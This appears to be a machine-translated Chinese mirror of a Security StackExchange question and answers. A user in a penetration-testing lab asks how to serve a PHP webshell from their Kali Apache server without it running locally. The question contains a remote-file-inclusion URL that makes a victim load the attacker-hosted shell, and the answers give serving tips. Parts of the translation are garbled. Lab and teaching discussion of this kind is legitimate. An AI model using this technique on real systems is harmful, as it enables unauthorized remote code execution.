首页
学习
活动
专区
圈层
工具
发布
社区首页 >问答首页 >在不本地运行的情况下提供php webshell

在不本地运行的情况下提供php webshell
EN

Security用户
提问于 2016-12-23 20:09:00
回答 2查看 1.8K关注 0票数 6

我在一个五官实验室里使用Kali Linux。

通过在受害者系统上输入以下URL,我可以让它访问我的apache服务器(我在日志中看到了200次访问响应),但是php文件在我的系统上呈现,然后在我自己的框上生成一个webshell:

https://10.0.0.1/section.php?page=http://10.0.0.2/phpshell.php%00

如何防止apache中的“更改绑定”运行?将其更改为.txt似乎会阻止它在这两个系统上运行;不确定是否可以用这种方式注射

EN

回答 2

Security用户

回答已采纳

发布于 2016-12-24 00:21:53

python -m SimpleHTTPServer 80

将生成一个简单的http服务器,它不是php所知道的,是最快的imho方式。

票数 5
EN

Security用户

发布于 2016-12-23 20:57:10

在apache或.htaccess文件中使用以下设置:

代码语言:javascript
复制
php_flag engine off

另见使用.htaccess禁用目录中的PHP (包括所有子目录)

票数 6
EN
页面原文内容由Security提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:

https://security.stackexchange.com/questions/146264

复制
相关文章

相似问题

领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档